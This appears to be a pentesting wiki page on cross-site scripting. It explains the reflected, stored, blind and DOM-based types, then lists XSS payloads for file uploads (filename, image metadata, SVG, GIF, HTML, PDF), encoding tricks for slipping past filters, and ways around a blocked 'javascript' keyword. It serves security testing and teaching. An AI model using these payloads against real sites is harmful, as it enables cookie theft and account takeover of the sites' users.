Skip to content

Cross-site scripting (XSS)

Concept

Cross-site scripting (also known as XSS) is a web security vulnerability that allows an attacker to compromise the interactions that users have with a vulnerable application. It allows an attacker to circumvent the same origin policy, which is designed to segregate different websites from each other. Cross-site scripting vulnerabilities normally allow an attacker to masquerade as a victim user, to carry out any actions that the user is able to perform, and to access any of the user's data. If the victim user has privileged access within the application, then the attacker might be able to gain full control over all of the application's functionality and data.

Types of XSS

  • Reflected cross-site scripting.

  • Stored cross-site scripting. [Blind XSS comes under S-XSS)

  • Document Object Model-based cross-site scripting

Reflected Cross-Site Scripting

Reflected cross-site scripting (or XSS) arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way.

Stored Cross-Site Scripting

Stored cross-site scripting (also known as second-order or persistent XSS) arises when an application receives data from an untrusted source and includes that data within its later HTTP responses in an unsafe way. Stored XSS allows potential attackers to inject client-side scripts directly onto target servers. This is not just a single user issue, however, it affects everyone who has access to these servers. Once attackers find a vulnerability in the web application, they can inject their script and wait for an unsuspecting target to fall into their trap. Sites that allow their users to share content (like blogs or social networking sites) are often the most targeted. The injected script is permanently stored on the now infected servers and allows the attacker to set their targets up to receive the malicious script from the servers when they make a request.

Blind Cross-Site Scripting

Blind XSS vulnerabilities are a variant of persistent XSS vulnerabilities. They occur when the attacker input is saved by the web server and executed as a malicious script in another part of the application or in another application. For example, an attacker injects a malicious payload into a contact/feedback page and when the administrator of the application is reviewing the feedback entries the attacker’s payload will be loaded. The attacker input can be executed in a completely different application (for example an internal application where the administrator reviews the access logs or the application exceptions).

Document Object Model-based Cross-Site Scripting

DOM-based XSS vulnerabilities usually arise when JavaScript takes data from an attacker-controllable source, such as the URL, and passes it to a sink that supports dynamic code execution, such as eval() or innerHTML. This enables attackers to execute malicious JavaScript, which typically allows them to hijack other users' accounts.

XSS via file upload payloads

XSS in a filename

"><img src=v onerror=prompt(xss);>.jpeg

Metadata (exit tool)

exiftool -Artist=’ “><img src=1 onerror=alert(document.domain)>’

brute.jpeg

SVG content XSS (save the below content in SVG file)

<svg xmlns="http://www.w3.org/2000/svg"

onload="alert(document.domain)"/>

Gif extension XSS (save the below content in gif file)

GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;

Html extension (save the below content in HTML file)

<!DOCTYPE html>

<html>

<head>

<title>XSS</title>

</head>

<body>

<script type="text/javascript">alert(document.cookie)</script>

<script>prompt(1);</script>

</body>

</html>

PDF extension

  • When content-type is not checked and magic bytes and file extensions are being checked.
%PDF-1.4

%äüöß

2 0 obj

<</Length 3 0 R/Filter/FlateDecode>>

stream

xœ=ŽË

1E÷ùŠ»v“¶é´0è~ àø

R

R<img src=x onerror=alert(document.cookie)>

Payloads

Bypassing First Filter

\<svg//////onload=alert(1)>
\<svg id=x;onload=alert(1)>
\<svg id=\`x\`onload=alert(1)>
\<svg%09onload=alert(1)>
\<svg onload%09=alert(1)>
\<svg%09onload%20=alert(1)>
\<svg onload%09%20%28%2C%3B=alert(1)>
\<svg onload+0B=alert(1)>
\<script>\u0061lert(1)\</script>
\<script>\u0061\u006c\u0065\u0072\u0074(1)\</script>
\<img src=x onerror="\u0061lert"/>
\<img src=x onerror="eval('\141lert(1)')"/>
\<img src=x onerror="eval('\x61lert(1)')"/>

Javascript Keyword is blocked

\<object data="JaVaScRiPt:alert(1)">
\<object data="javascript\&colon;alert(1)">
\<object data="java &#x20;&#x20;script:alert(1)">
\<object data="javascript\&#x003A;alert(1)">
\<object data="javascript\&#58;alert(1)">
\<object data="\&#x6A;avascript;alert(1)">
\<object data="\&#x6A;\&#x61;\&#x76;\&#x61;\&#x73;\&#x63;\&#x72;\&#x69;\&#x70;74;\&#x3A;alert(1)">
\<object data="data:text/html,\<script>alert(1)\</script>">
\<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">

Tools

The Best tool for Blind XSS

Has 2fa, email reports, share reports feature

Knoxss

Automation XSS

References